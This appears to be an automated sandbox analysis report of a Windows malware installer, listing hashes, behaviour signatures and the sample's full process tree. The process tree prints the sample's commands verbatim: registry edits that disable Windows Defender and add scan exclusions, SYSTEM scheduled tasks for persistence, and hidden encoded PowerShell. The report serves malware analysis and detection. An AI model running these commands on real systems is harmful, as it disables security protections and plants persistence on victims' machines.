Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
06-02-2023 16:07
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
01edc1f02ddb4baad6444a57a14f7901
-
SHA1
a028ce7a1a6e255028942ac2e8e033be95bc61fb
-
SHA256
802d1206ae6e3b640bd89c3b9a5324dc6a81000709fc07c24c6322a08aa403e2
-
SHA512
82733a48cea564a12fa51082781d27c6e22530d643be56e53fe799b449c4739492fdd34f2fd51dcebe2462a7cd6883548cbc2e361c86963b9b7102dffefd3952
-
SSDEEP
196608:91OUjk2aGT4VbKQM3POFeNBMKtQb2FNqSs:3OV2T4Vbw/O4gKYiHs
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops Chrome extension 1 IoCs
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYjsouvPc" /SC once /ST 02:58:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYjsouvPc"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYjsouvPc"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "boytPmuAkKgmiEZYSe" /SC once /ST 17:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\WGWlQUs.exe\" X6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {DDC4AC88-2238-4243-BFB0-54127E55A503} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {1FBC24C4-BD0F-441E-879E-B76D175B9DD7} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\WGWlQUs.exeC:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\WGWlQUs.exe X6 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtdACsSKm" /SC once /ST 14:11:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtdACsSKm"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtdACsSKm"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxRflDcpa" /SC once /ST 02:19:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxRflDcpa"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxRflDcpa"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\UIFvrSrxAzeYKEuX\jjHjxerq\nixwhbMlwWstWgGw.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\UIFvrSrxAzeYKEuX\jjHjxerq\nixwhbMlwWstWgGw.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WoychCUlhHkYXpVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UIFvrSrxAzeYKEuX" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNmfvkMAN" /SC once /ST 16:21:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNmfvkMAN"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNmfvkMAN"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tRsUEOedRvIwZoOQu" /SC once /ST 14:44:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\rXdRXZw.exe\" nL /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tRsUEOedRvIwZoOQu"3⤵
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\rXdRXZw.exeC:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\rXdRXZw.exe nL /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "boytPmuAkKgmiEZYSe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wRLQelouU\WLjKmn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xhAFLspUEGhlntx" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xhAFLspUEGhlntx2" /F /xml "C:\Program Files (x86)\wRLQelouU\uCrRXcq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xhAFLspUEGhlntx"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xhAFLspUEGhlntx"3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-961367624780993672-15354584422002589200-469532859-992919477335365664134049696"1⤵
- Windows security bypass
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\wRLQelouU\uCrRXcq.xmlFilesize
2KB
MD5d29e953673a2a462968421da9a577426
SHA170be4e9adda453ba3e0d52148d0e2a5e07f713f3
SHA256b4f7cd39337d6e77c730240e0ecde4028e1a1bd7c1a42161960f31e2e5114ca6
SHA512c8b7f1f3516c511dd6addf3696f86a06068446ac7a4de2ee59aa663d5165771162c81344b5d26709187d691c258bb7300ed9ce2a9cb074276516b8cd53976d85
-
C:\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exeFilesize
6.3MB
MD5e60c51107adfeca90bde43deb57f4688
SHA1f222c460fa96184bc2fe82e8e041eb6b12f8f5aa
SHA256a17b2c41dd6b592f61f9e1d407854dfb1465c569cc44335b36c2cb2b84f17690
SHA5122b2c4d493b11bbb654a706536a59e16a34e4ffc88458880b9b334d4a5782c5d2661b6c421e5d46bffc7938fe0dbb8450842d2182f5ccc6da471a3d2a48f80884
-
C:\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exeFilesize
6.3MB
MD5e60c51107adfeca90bde43deb57f4688
SHA1f222c460fa96184bc2fe82e8e041eb6b12f8f5aa
SHA256a17b2c41dd6b592f61f9e1d407854dfb1465c569cc44335b36c2cb2b84f17690
SHA5122b2c4d493b11bbb654a706536a59e16a34e4ffc88458880b9b334d4a5782c5d2661b6c421e5d46bffc7938fe0dbb8450842d2182f5ccc6da471a3d2a48f80884
-
C:\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\WGWlQUs.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\WGWlQUs.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
